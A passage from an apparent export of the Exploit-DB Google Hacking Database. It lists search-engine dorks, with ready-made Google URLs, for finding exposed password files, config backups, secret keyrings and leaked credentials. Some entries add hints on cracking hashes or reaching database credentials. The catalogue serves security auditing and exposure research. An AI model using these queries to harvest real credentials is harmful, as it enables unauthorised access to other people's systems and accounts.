Description: this dork will return username and password sent in GET
request from proxies logs.
Author: Sandeep kumar
</textualDescription>
<query>inurl:logs intext:GET https:// ext:txt intext:password intext:username</query>
<querystring>https://www.google.com/search?q=inurl:logs intext:GET https:// ext:txt intext:password intext:username</querystring>
<edb></edb>
<date>2020-06-30</date>
<author>Sandeep Kumar</author>
</entry>
<entry>
<id>421</id>
<link>https://www.exploit-db.com/ghdb/421</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:nuke filetype:sql</shortDescription>
<textualDescription>This search reveals database dumps that most likely relate to the php-nuke or postnuke content management systems. These database dumps contain usernames and (sometimes) encrypted passwords for users of the system.</textualDescription>
<query>inurl:nuke filetype:sql</query>
<querystring>https://www.google.com/search?q=inurl%3Anuke+filetype%3Asql</querystring>
<edb></edb>
<date>2004-08-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>283</id>
<link>https://www.exploit-db.com/ghdb/283</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:ospfd.conf intext:password -sample -test -tutorial -download</shortDescription>
<textualDescription>GNU Zebra is free software that manages TCP/IP based routing protocols. It supports BGP-4 protocol as well as RIPv1, RIPv2 and OSPFv2.The ospfd.conf uses the same format as the cisco config files. There is an enable password (plain text or encrypted) and ipv6 tunnel definitions, hostnames, ethernet interface names, ip routing information, etc.</textualDescription>
<query>inurl:ospfd.conf intext:password -sample -test -tutorial -download</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=inurl%3Aospfd.conf+intext%3Apassword+-sample+-test+-tutorial+-download</querystring>
<edb></edb>
<date>2004-06-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>647</id>
<link>https://www.exploit-db.com/ghdb/647</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:pap-secrets -cvs</shortDescription>
<textualDescription>linux vpns store there usernames and passwords for PAP authentification in a file called &quot;pap-secrets&quot; where the usernames and the passwords are in cleartext.</textualDescription>
<query>inurl:pap-secrets -cvs</query>
<querystring>https://www.google.com/search?q=inurl%3Apap-secrets+-cvs+</querystring>
<edb></edb>
<date>2004-11-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>1010</id>
<link>https://www.exploit-db.com/ghdb/1010</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:pass.dat</shortDescription>
<textualDescription>Accesses passwords mostly in cgibin but not all the timeCan find passwords + usernames (sometimes username), some unecrypted some not</textualDescription>
<query>filetype:dat inurl:pass.dat</query>
<querystring>https://www.google.com/search?q=filetype%3Adat+inurl%3Apass.dat</querystring>
<edb></edb>
<date>2005-06-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>7511</id>
<link>https://www.exploit-db.com/ghdb/7511</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:password site:shodan.io</shortDescription>
<textualDescription># Google Dork: inurl:password site:shodan.io
# Files Containing Passwords
# Date:28/10/2021
# Exploit Author: jawhar milkan</textualDescription>
<query>inurl:password site:shodan.io</query>
<querystring>https://www.google.com/search?q=inurl:password site:shodan.io</querystring>
<edb></edb>
<date>2021-10-28</date>
<author>jawhar milkan</author>
</entry>
<entry>
<id>198</id>
<link>https://www.exploit-db.com/ghdb/198</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:perform filetype:ini</shortDescription>
<textualDescription>Displays the perform.ini file used by the popular irc client mIRC. Often times has channel passwords and/or login passwords for nickserv.</textualDescription>
<query>inurl:perform filetype:ini</query>
<querystring>https://www.google.com/search?q=inurl%3Aperform+filetype%3Aini</querystring>
<edb></edb>
<date>2004-05-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>996</id>
<link>https://www.exploit-db.com/ghdb/996</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:perform.ini filetype:ini</shortDescription>
<textualDescription>mIRC Passwords For Nicks &amp; Channels in channel\[chanfolder] section of mirc.ini you can find 2 type of &quot;private&quot; information - secret channels (that is +ps is not listed everythere) and password protected channels - passwords stored in plaintext)</textualDescription>
<query>inurl:perform.ini filetype:ini</query>
<querystring>https://www.google.com/search?q=inurl:perform.ini+filetype:ini</querystring>
<edb></edb>
<date>2005-06-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>4369</id>
<link>https://www.exploit-db.com/ghdb/4369</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:proftpdpasswd</shortDescription>
<textualDescription>Dork of proftpd passwords!.
Have Fun!.
Dork by Rootkit Pentester.</textualDescription>
<query>inurl:proftpdpasswd</query>
<querystring>https://www.google.com/search?q=inurl:proftpdpasswd</querystring>
<edb></edb>
<date>2016-12-05</date>
<author>anonymous</author>
</entry>
<entry>
<id>114</id>
<link>https://www.exploit-db.com/ghdb/114</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:secring ext:skr | ext:pgp | ext:bak</shortDescription>
<textualDescription>This file is the secret keyring for PGP encryption. Armed with this file (and perhaps a passphrase), a malicious user can read all your encrypted files! This should not be posted on the web!</textualDescription>
<query>inurl:secring ext:skr | ext:pgp | ext:bak</query>
<querystring>https://www.google.com/search?q=inurl:secring+ext:skr+%7C+ext:pgp+%7C+ext:bak</querystring>
<edb></edb>
<date>2004-03-04</date>
<author>anonymous</author>
</entry>
<entry>
<id>974</id>
<link>https://www.exploit-db.com/ghdb/974</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:server.cfg rcon password</shortDescription>
<textualDescription>Counter strike rcon passwords, saved in the server.cfg.</textualDescription>
<query>inurl:server.cfg rcon password</query>
<querystring>https://www.google.com/search?hl=de&amp;q=inurl%3Aserver.cfg++rcon+password</querystring>
<edb></edb>
<date>2005-05-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>3943</id>
<link>https://www.exploit-db.com/ghdb/3943</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:typo3conf/localconf.php</shortDescription>
<textualDescription>typo3 passwords :-)
Bruno Schmid</textualDescription>
<query>inurl:typo3conf/localconf.php</query>
<querystring>https://www.google.com/search?q=inurl:typo3conf/localconf.php</querystring>
<edb></edb>
<date>2014-04-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>5253</id>
<link>https://www.exploit-db.com/ghdb/5253</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:users.json + &quot;username&quot;</shortDescription>
<textualDescription>inurl:users.json + &quot;username&quot;
File contain usernames and passwords
ManhNho
</textualDescription>
<query>inurl:users.json + &quot;username&quot;</query>
<querystring>https://www.google.com/search?q=inurl:users.json + &quot;username&quot;</querystring>
<edb></edb>
<date>2019-06-06</date>
<author>ManhNho</author>
</entry>
<entry>
<id>1221</id>
<link>https://www.exploit-db.com/ghdb/1221</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:ventrilo_srv.ini adminpassword</shortDescription>
<textualDescription>This search reveals the ventrilo (voice communication program used by many online gamers) passwords for many servers. Possiblity of gaining control of the entire server.</textualDescription>
<query>inurl:ventrilo_srv.ini adminpassword</query>
<querystring>https://www.google.com/search?q=inurl%3Aventrilo_srv.ini+adminpassword</querystring>
<edb></edb>
<date>2005-12-19</date>
<author>anonymous</author>
</entry>
<entry>
<id>222</id>
<link>https://www.exploit-db.com/ghdb/222</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:vtund.conf intext:pass -cvs</shortDescription>
<textualDescription>Theses are vtund configuration files (http://vtun.sourceforge.net). Vtund is an encrypted tunneling program. The conf file holds plaintext passwords. Many sites use the default password, but some do not. Regardless, attackers can use this information to gather information about a site.</textualDescription>
<query>inurl:vtund.conf intext:pass -cvs</query>
<querystring>https://www.google.com/search?q=inurl%3Avtund.conf+intext%3Apass+-cvs</querystring>
<edb></edb>
<date>2004-05-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>3670</id>
<link>https://www.exploit-db.com/ghdb/3670</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:web/frontend_dev.php -trunk</shortDescription>
<textualDescription>Google search for web site build with symfony framework and in
development environment.
In most case, you have a bar development on top of the web page. If you
go in config -&gt; Settings, you can find login and password.
if you replace web/frontend_dev.php by config/databases.yml in url, you
can find login / password for the databases
Author: Simon Leblanc</textualDescription>
<query>inurl:web/frontend_dev.php -trunk</query>
<querystring>https://www.google.com/search?q=inurl:web/frontend_dev.php -trunk</querystring>
<edb></edb>
<date>2011-01-09</date>
<author>anonymous</author>
</entry>
<entry>
<id>4181</id>
<link>https://www.exploit-db.com/ghdb/4181</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:wp-config -intext:wp-config &quot;'DB_PASSWORD'&quot;</shortDescription>
<textualDescription>I give this Dork for Wordpress Passwords. I hope you enjoy with this!.
Dork: inurl:wp-config -intext:wp-config &quot;'DB_PASSWORD'&quot;
Best Regards Rookit Pentester.</textualDescription>
<query>inurl:wp-config -intext:wp-config &quot;'DB_PASSWORD'&quot;</query>
<querystring>https://www.google.com/search?q=inurl:wp-config -intext:wp-config &quot;'DB_PASSWORD'&quot;</querystring>
<edb></edb>
<date>2016-01-11</date>
<author>anonymous</author>
</entry>
<entry>
<id>4871</id>
<link>https://www.exploit-db.com/ghdb/4871</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:wp-config-backup.txt</shortDescription>
<textualDescription>inurl:wp-config-backup.txt
You can see user and pass database
maxbomb
</textualDescription>
<query>inurl:wp-config-backup.txt</query>
<querystring>https://www.google.com/search?q=inurl:wp-config-backup.txt</querystring>
<edb></edb>
<date>2018-06-25</date>
<author>maxbomb</author>
</entry>
<entry>
<id>4924</id>
<link>https://www.exploit-db.com/ghdb/4924</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:wp-config.bak</shortDescription>
<textualDescription>inurl:wp-config.bak
This Google Dork discovers badly configured servers exposing sensitive
Wordpress setup information.
- Gionathan &quot;John&quot; Reale (https://www.exploit-db.com/author/?a=9609)
</textualDescription>
<query>inurl:wp-config.bak</query>
<querystring>https://www.google.com/search?q=inurl:wp-config.bak</querystring>
<edb></edb>
<date>2018-08-17</date>
<author>Gionathan Reale</author>
</entry>
<entry>
<id>5199</id>
<link>https://www.exploit-db.com/ghdb/5199</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:wp-config.php intext:DB_PASSWORD -stackoverflow -wpbeginner</shortDescription>
<textualDescription>Description :
Plain text wordpress config responses, exposing DB passwords
Dork:
inurl:wp-config.php intext:DB_PASSWORD -stackoverflow -wpbeginner
Author:
Vipin Joshi(@vocuzi)
</textualDescription>
<query>inurl:wp-config.php intext:DB_PASSWORD -stackoverflow -wpbeginner</query>
<querystring>https://www.google.com/search?q=inurl:wp-config.php intext:DB_PASSWORD -stackoverflow -wpbeginner</querystring>
<edb></edb>
<date>2019-05-06</date>
<author>vocuzi</author>
</entry>
<entry>
<id>7250</id>
<link>https://www.exploit-db.com/ghdb/7250</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:wp-config.php.save</shortDescription>
<textualDescription># Google Dork: inurl:wp-config.php.save
# Files Containing Passwords
# Date: 02/08/2021
# Exploit Author: Mohsin Khan</textualDescription>
<query>inurl:wp-config.php.save</query>
<querystring>https://www.google.com/search?q=inurl:wp-config.php.save</querystring>
<edb></edb>
<date>2021-09-17</date>
<author>Mohsin Khan</author>
</entry>
<entry>
<id>4154</id>
<link>https://www.exploit-db.com/ghdb/4154</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:wp-content/uploads filetype:xls | filetype:xlsx password</shortDescription>
<textualDescription>inurl:wp-content/uploads filetype:xls | filetype:xlsx password</textualDescription>
<query>inurl:wp-content/uploads filetype:xls | filetype:xlsx password</query>
<querystring>https://www.google.com/search?q=inurl:wp-content/uploads filetype:xls | filetype:xlsx password</querystring>
<edb></edb>
<date>2015-12-16</date>
<author>anonymous</author>
</entry>
<entry>
<id>3959</id>
<link>https://www.exploit-db.com/ghdb/3959</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:ws_ftp.ini &quot;[WS_FTP]&quot; filetype:ini</shortDescription>
<textualDescription>inurl:ws_ftp.ini &quot;[WS_FTP]&quot; filetype:ini
Files containing passwords
By Dr4GoR1Ty</textualDescription>
<query>inurl:ws_ftp.ini &quot;[WS_FTP]&quot; filetype:ini</query>
<querystring>https://www.google.com/search?q=inurl:ws_ftp.ini &quot;[WS_FTP]&quot; filetype:ini</querystring>
<edb></edb>
<date>2014-08-21</date>
<author>anonymous</author>
</entry>
<entry>
<id>3978</id>
<link>https://www.exploit-db.com/ghdb/3978</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:yahoo_site_admin/credentials/</shortDescription>
<textualDescription># Exploit Title: [Yahoo Hosting db-credentials]
# Google Dork: [inurl:yahoo_site_admin/credentials/]
# Date: [29/11/2014]
# Exploit Author: [Mohammad Shahein]
# Vendor Homepage: [www.boxeffect.com ]
# Tested on: Win7 ,Google Chrome Version 39.0.2171.71 m]
Google the dork it will allow you to download db.conf the file will contain
the following info
mysql
[ database name ]
[ database user name ]
[ database password ]
*Mohammad Shaheen*
senior Programer, BoxEffect
website: www.boxeffect.com</textualDescription>
<query>inurl:yahoo_site_admin/credentials/</query>
<querystring>https://www.google.com/search?q=inurl:yahoo_site_admin/credentials/</querystring>
<edb></edb>
<date>2014-12-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>282</id>
<link>https://www.exploit-db.com/ghdb/282</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:zebra.conf intext:password -sample -test -tutorial -download</shortDescription>
<textualDescription>GNU Zebra is free software that manages TCP/IP based routing protocols. It supports BGP-4 protocol as well as RIPv1, RIPv2 and OSPFv2.The zebra.conf uses the same format as the cisco config files. There is an enable password (plain text or encrypted) and ipv6 tunnel definitions, hostnames, ethernet interface names, ip routing information, etc.</textualDescription>
<query>inurl:zebra.conf intext:password -sample -test -tutorial -download</query>
<querystring>https://www.google.com/search?q=inurl%3Azebra.conf+intext%3Apassword+-sample+-test+-tutorial+-download&amp;btnG=Google+Search</querystring>
<edb></edb>
<date>2004-06-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>4570</id>
<link>https://www.exploit-db.com/ghdb/4570</link>
<category>Files Containing Passwords</category>
<shortDescription>inurl:_vti_pvt/administrators.pwd</shortDescription>
<textualDescription>Here is a Google Dork to retrieve *sensitive information Login/password for
MS FrontPage share point*
inurl:_vti_pvt/administrators.pwd
Sold1er .</textualDescription>
<query>inurl:_vti_pvt/administrators.pwd</query>
<querystring>https://www.google.com/search?q=inurl:_vti_pvt/administrators.pwd</querystring>
<edb></edb>
<date>2017-08-03</date>
<author>anonymous</author>
</entry>
<entry>
<id>6643</id>
<link>https://www.exploit-db.com/ghdb/6643</link>
<category>Files Containing Passwords</category>
<shortDescription>jdbc:mysql://localhost:3306/ + username + password ext:yml | ext:javascript -git -gitlab</shortDescription>
<textualDescription># Google Dork : jdbc:mysql://localhost:3306/ + username + password ext:yml | ext:javascript -git -gitlab
# Description : Exposed usernames and passwords.
# Date: 22/10/2020
# Author: Jose Praveen
</textualDescription>
<query>jdbc:mysql://localhost:3306/ + username + password ext:yml | ext:javascript -git -gitlab</query>
<querystring>https://www.google.com/search?q=jdbc:mysql://localhost:3306/ + username + password ext:yml | ext:javascript -git -gitlab</querystring>
<edb></edb>
<date>2020-10-28</date>
<author>Jose Praveen</author>
</entry>
<entry>
<id>6658</id>
<link>https://www.exploit-db.com/ghdb/6658</link>
<category>Files Containing Passwords</category>
<shortDescription>jdbc:oracle://localhost: + username + password ext:yml | ext:java -git -gitlab</shortDescription>
<textualDescription># Google Dork: jdbc:oracle://localhost: + username + password ext:yml | ext:java -git -gitlab
# Exposed usernames and passwords.
# Date: 29/10/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>jdbc:oracle://localhost: + username + password ext:yml | ext:java -git -gitlab</query>
<querystring>https://www.google.com/search?q=jdbc:oracle://localhost: + username + password ext:yml | ext:java -git -gitlab</querystring>
<edb></edb>
<date>2020-11-06</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>6657</id>
<link>https://www.exploit-db.com/ghdb/6657</link>
<category>Files Containing Passwords</category>
<shortDescription>jdbc:postgresql://localhost: + username + password ext:yml | ext:java -git -gitlab</shortDescription>
<textualDescription># Google Dork: jdbc:postgresql://localhost: + username + password ext:yml | ext:java -git -gitlab
# Exposed usernames and passwords.
# Date: 29/10/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>jdbc:postgresql://localhost: + username + password ext:yml | ext:java -git -gitlab</query>
<querystring>https://www.google.com/search?q=jdbc:postgresql://localhost: + username + password ext:yml | ext:java -git -gitlab</querystring>
<edb></edb>
<date>2020-11-06</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>443</id>
<link>https://www.exploit-db.com/ghdb/443</link>
<category>Files Containing Passwords</category>
<shortDescription>LeapFTP intitle:&quot;index.of./&quot; sites.ini modified</shortDescription>
<textualDescription>The LeapFTP client configuration file &quot;sites.ini&quot; holds the login credentials for those sites in plain text. The passwords seems to be encrypted.</textualDescription>
<query>LeapFTP intitle:&quot;index.of./&quot; sites.ini modified</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=LeapFTP+intitle%3A%22index.of.%2F%22+sites.ini+modified</querystring>
<edb></edb>
<date>2004-08-20</date>
<author>anonymous</author>
</entry>
<entry>
<id>20</id>
<link>https://www.exploit-db.com/ghdb/20</link>
<category>Files Containing Passwords</category>
<shortDescription>master.passwd</shortDescription>
<textualDescription>There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. The hits in this search show &quot;master.passwd&quot; files which contain encrypted passwords which may look like this: &quot;guest MMCHhvZ6ODgFo&quot; A password cracker can eat cheesy hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!For master.passwd, be sure to check other files in the same directory...</textualDescription>
<query>intitle:index.of master.passwd</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Index+of%22+master%2Epasswd</querystring>
<edb></edb>
<date>2003-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>11</id>
<link>https://www.exploit-db.com/ghdb/11</link>
<category>Files Containing Passwords</category>
<shortDescription>mysql history files</shortDescription>
<textualDescription>The .mysql_history file contains commands that were performed against a mysql database. A &quot;history&quot; of said commands. First, you shouldn't show this file to anyone, especially not a MAJOR SEARCH ENGINE! Secondly, I sure hope you wouldn't type anything sensitive while interacting with your databases, like oh say USERNAMES AND PASSWORDS...</textualDescription>
<query>intitle:&quot;Index of&quot; .mysql_history</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Index+of%22+%2Emysql%5Fhistory</querystring>
<edb></edb>
<date>2003-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>328</id>
<link>https://www.exploit-db.com/ghdb/328</link>
<category>Files Containing Passwords</category>
<shortDescription>NickServ registration passwords</shortDescription>
<textualDescription>NickServ allows you to &quot;register&quot; a nickname (on some IRC networks) and prevent others from using it. Some channels also require you to use a registered nickname to join.This search contains the the nickserv response message to a nick registration. Lots of example sites, but some that aren't... you can see which ones are fake or not in the search (some are like, your_password, while other are more realistic ones).</textualDescription>
<query>&quot;Your password is * Remember this for later use&quot;</query>
<querystring>https://www.google.com/search?q=%22Your+password+is+*+Remember+this+for+later+use%22</querystring>
<edb></edb>
<date>2004-07-12</date>
<author>anonymous</author>
</entry>
<entry>
<id>32</id>
<link>https://www.exploit-db.com/ghdb/32</link>
<category>Files Containing Passwords</category>
<shortDescription>passlist</shortDescription>
<textualDescription>I'm not sure what uses this, but the passlist and passlist.txt files contain passwords in CLEARTEXT! That's right, no decoding/decrypting/encrypting required. How easy is this?*sigh*Supreme googledorkage</textualDescription>
<query>index.of passlist</query>
<querystring>https://www.google.com/search?safe=off&amp;q=intitle%3Aindex.of+passlist</querystring>
<edb></edb>
<date>2003-06-27</date>
<author>anonymous</author>
</entry>
<entry>
<id>58</id>
<link>https://www.exploit-db.com/ghdb/58</link>
<category>Files Containing Passwords</category>
<shortDescription>passlist.txt (a better way)</shortDescription>
<textualDescription>Cleartext passwords. No decryption required!</textualDescription>
<query>inurl:passlist.txt</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=inurl%3Apasslist.txt</querystring>
<edb></edb>
<date>2004-01-23</date>
<author>anonymous</author>
</entry>
<entry>
<id>19</id>
<link>https://www.exploit-db.com/ghdb/19</link>
<category>Files Containing Passwords</category>
<shortDescription>passwd</shortDescription>
<textualDescription>There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. The hits in this search show &quot;passwd&quot; files which contain encrypted passwords which may look like this: &quot;guest MMCHhvZ6ODgFo&quot; A password cracker can eat cheesy hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!</textualDescription>
<query>intitle:index.of passwd passwd.bak</query>
<querystring>https://www.google.com/search?safe=off&amp;q=intitle%3A%22Index+of%22+passwd+passwd.bak</querystring>
<edb></edb>
<date>2003-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>25</id>
<link>https://www.exploit-db.com/ghdb/25</link>
<category>Files Containing Passwords</category>
<shortDescription>passwd / etc (reliable)</shortDescription>
<textualDescription>There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. And what if the passwords are hashed? A password cracker can eat cheesy password hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!</textualDescription>
<query>intitle:&quot;Index of..etc&quot; passwd</query>
<querystring>https://www.google.com/search?safe=off&amp;q=intitle%3A%22Index+of..etc%22+passwd</querystring>
<edb></edb>
<date>2003-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>5814</id>
<link>https://www.exploit-db.com/ghdb/5814</link>
<category>Files Containing Passwords</category>
<shortDescription>password console-password ext:cfg -git</shortDescription>
<textualDescription># Google Dork: password console-password ext:cfg -git
# By using this dork, passwords in configuration files can be found.
# Date: 20/03/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>password console-password ext:cfg -git</query>
<querystring>https://www.google.com/search?q=password console-password ext:cfg -git</querystring>
<edb></edb>
<date>2020-03-20</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>18</id>
<link>https://www.exploit-db.com/ghdb/18</link>
<category>Files Containing Passwords</category>
<shortDescription>people.lst</shortDescription>
<textualDescription>*sigh*</textualDescription>
<query>intitle:index.of people.lst</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Index+of%22+%22people%2Elst%22</querystring>
<edb></edb>
<date>2003-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>307</id>
<link>https://www.exploit-db.com/ghdb/307</link>
<category>Files Containing Passwords</category>
<shortDescription>psyBNC config files</shortDescription>
<textualDescription>psyBNC is an IRC-Bouncer with many features. It compiles on Linux, FreeBSD, SunOs and Solaris. The configuration file for psyBNC is called psybnc.conf (duh).An attacker can use the password, host and portinformation in this file to bounce his IRC connection through these bouncers, providing some privacy or just to show off some fancy irc hostname that are usually linked to those IP addresses.</textualDescription>
<query>filetype:conf inurl:psybnc.conf &quot;USER.PASS=&quot;</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=filetype%3Aconf+inurl%3Apsybnc.conf++%22USER.PASS%3D%22</querystring>
<edb></edb>
<date>2004-07-06</date>
<author>anonymous</author>
</entry>
<entry>
<id>21</id>
<link>https://www.exploit-db.com/ghdb/21</link>
<category>Files Containing Passwords</category>
<shortDescription>pwd.db</shortDescription>
<textualDescription>There's nothing that defines a googleDork more than getting your PASSWORDS grabbed by Google for the world to see. Truly the epitome of a googleDork. The his in this search show &quot;pwd.db&quot; files which contain encrypted passwords which may look like this: &quot;guest MMCHhvZ6ODgFo&quot; A password cracker can eat cheesy hashes faster than Elvis eatin' jelly doughnuts. Bravo googleDorks! Good show!</textualDescription>
<query>intitle:&quot;Index of&quot; pwd.db</query>
<querystring>https://www.google.com/search?q=intitle%3A%22Index+of%22+pwd%2Edb</querystring>
<edb></edb>
<date>2003-06-24</date>
<author>anonymous</author>
</entry>
<entry>
<id>6595</id>
<link>https://www.exploit-db.com/ghdb/6595</link>
<category>Files Containing Passwords</category>
<shortDescription>rootpw --iscrypted ext:cfg</shortDescription>
<textualDescription># Google Dork: rootpw --iscrypted ext:cfg
# Exposed passwords.
# Date: 5/10/2020
# Exploit Author: Alexandros Pappas
</textualDescription>
<query>rootpw --iscrypted ext:cfg</query>
<querystring>https://www.google.com/search?q=rootpw --iscrypted ext:cfg</querystring>
<edb></edb>
<date>2020-10-06</date>
<author>Alexandros Pappas</author>
</entry>
<entry>
<id>5234</id>
<link>https://www.exploit-db.com/ghdb/5234</link>
<category>Files Containing Passwords</category>
<shortDescription>s3 site:amazonaws.com filetype:xls password</shortDescription>
<textualDescription>excel files containing user id and password information stored on AWS S3
buckets
*Google Dork*
s3 site:amazonaws.com filetype:xls password
*Dates: *22-05-2019
*Dork Author:* acc3ssp0int
*Tested on:* any OS with a functioning browser running Google.com</textualDescription>
<query>s3 site:amazonaws.com filetype:xls password</query>
<querystring>https://www.google.com/search?q=s3 site:amazonaws.com filetype:xls password</querystring>
<edb></edb>
<date>2019-05-31</date>
<author>acc3ssp0int</author>
</entry>
<entry>
<id>1173</id>
<link>https://www.exploit-db.com/ghdb/1173</link>
<category>Files Containing Passwords</category>
<shortDescription>server-dbs &quot;intitle:index of&quot;</shortDescription>
<textualDescription>Yes, people actually post their teamspeak servers on websites. Just look for the words superadmin in the files and the password trails it in plain text.</textualDescription>
<query>server-dbs &quot;intitle:index of&quot;</query>
<querystring>https://www.google.com/search?as_q=server-dbs&amp;num=100&amp;c2coff=1&amp;btnG=Google+Search&amp;as_epq=intitle%3Aindex+of&amp;as_oq=&amp;as_eq=&amp;as_ft=i&amp;as_filetype=&amp;as_qdr=all&amp;as_occt=any&amp;as_dt=i&amp;as_sitesearch=&amp;safe=images</querystring>
<edb></edb>
<date>2005-10-30</date>
<author>anonymous</author>
</entry>
<entry>
<id>260</id>
<link>https://www.exploit-db.com/ghdb/260</link>
<category>Files Containing Passwords</category>
<shortDescription>signin filetype:url</shortDescription>
<textualDescription>Javascript for user validation is a bad idea as it shows cleartext user/pass combos. There is one googledork who forgot that.</textualDescription>
<query>signin filetype:url</query>
<querystring>https://www.google.com/search?num=100&amp;safe=off&amp;q=signin+filetype%3Aurl</querystring>
<edb></edb>
<date>2004-05-26</date>
<author>anonymous</author>
</entry>
<entry>
<id>6825</id>
<link>https://www.exploit-db.com/ghdb/6825</link>
<category>Files Containing Passwords</category>
<shortDescription>site:*.blob.core.windows.net ext:xls | ext:xlsx (login | password | username)</shortDescription>
<textualDescription>#Dork: site:*.blob.core.windows.net ext:xls | ext:xlsx (login | password | username)</textualDescription>
<query>site:*.blob.core.windows.net ext:xls | ext:xlsx (login | password | username)</query>
<querystring>https://www.google.com/search?q=site:*.blob.core.windows.net ext:xls | ext:xlsx (login | password | username)</querystring>
<edb></edb>
<date>2021-03-11</date>
<author>higormelga</author>
</entry>
<entry>
<id>4392</id>
<link>https://www.exploit-db.com/ghdb/4392</link>
<category>Files Containing Passwords</category>
<shortDescription>site:cloudshark.org/captures# password</shortDescription>
<textualDescription>Dork: site:cloudshark.org/captures# password
PCAP captures containing passwords
Mr. Cheshire
See also: http://www.elladodelmal.com/2017/02/cloudshark-tus-credenciales-en-las.html</textualDescription>
<query>site:cloudshark.org/captures# password</query>
<querystring>https://www.google.com/search?q=site:cloudshark.org/captures# password</querystring>
<edb></edb>
<date>2017-02-07</date>
<author>anonymous</author>
</entry>
<entry>
<id>7808</id>
<link>https://www.exploit-db.com/ghdb/7808</link>
<category>Files Containing Passwords</category>
<shortDescription>site:controlc.com intext:&quot;password&quot;</shortDescription>
<textualDescription># Google Dork: site:controlc.com intext:&quot;password&quot;
# Files Containing Passwords
# Date:15/11/2021
# Exploit Author: Anirudh Kumar Kushwaha</textualDescription>
<query>site:controlc.com intext:&quot;password&quot;</query>
<querystring>https://www.google.com/search?q=site:controlc.com intext:&quot;password&quot;</querystring>
<edb></edb>
<date>2021-11-15</date>
<author>Anirudh Kumar Kushwaha</author>
</entry>
<entry>
<id>4299</id>
<link>https://www.exploit-db.com/ghdb/4299</link>
<category>Files Containing Passwords</category>
<shortDescription>site:github.com ext:csv userid | username | user -example password</shortDescription>
<textualDescription>Whoops.
site:github.com ext:csv userid | username | user -example password
Decoy</textualDescription>
<query>site:github.com ext:csv userid | username | user -example password</query>
<querystring>https://www.google.com/search?q=site:github.com ext:csv userid | username | user -example password</querystring>
<edb></edb>
<date>2016-06-10</date>
<author>anonymous</author>
</entry>
<entry>
<id>3898</id>
<link>https://www.exploit-db.com/ghdb/3898</link>
<category>Files Containing Passwords</category>
<shortDescription>site:github.com inurl:sftp-config.json</shortDescription>
<textualDescription>Find disclosed FTP login credentials in github repositories
Credit: RogueCoder</textualDescription>
<query>site:github.com inurl:sftp-config.json</query>
<querystring>https://www.google.com/search?q=site%3Agithub.com+inurl%3Asftp-config.json</querystring>
<edb></edb>
<date>2013-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>3897</id>
<link>https://www.exploit-db.com/ghdb/3897</link>
<category>Files Containing Passwords</category>
<shortDescription>site:github.com inurl:sftp-config.json intext:/wp-content/</shortDescription>
<textualDescription>Finds disclosed ftp FTP for Wordpress installs, which have been pushed to a public repo on GitHub.
Credit: RogueCoder</textualDescription>
<query>site:github.com inurl:sftp-config.json intext:/wp-content/</query>
<querystring>https://www.google.com/search?q=site%3Agithub.com+inurl%3Asftp-config.json+intext%3A%2Fwp-content%2F</querystring>
<edb></edb>
<date>2013-11-25</date>
<author>anonymous</author>
</entry>
<entry>
<id>7804</id>
<link>https://www.exploit-db.com/ghdb/7804</link>
<category>Files Containing Passwords</category>
<shortDescription>site:pastebin.com &quot;admin password&quot;</shortDescription>
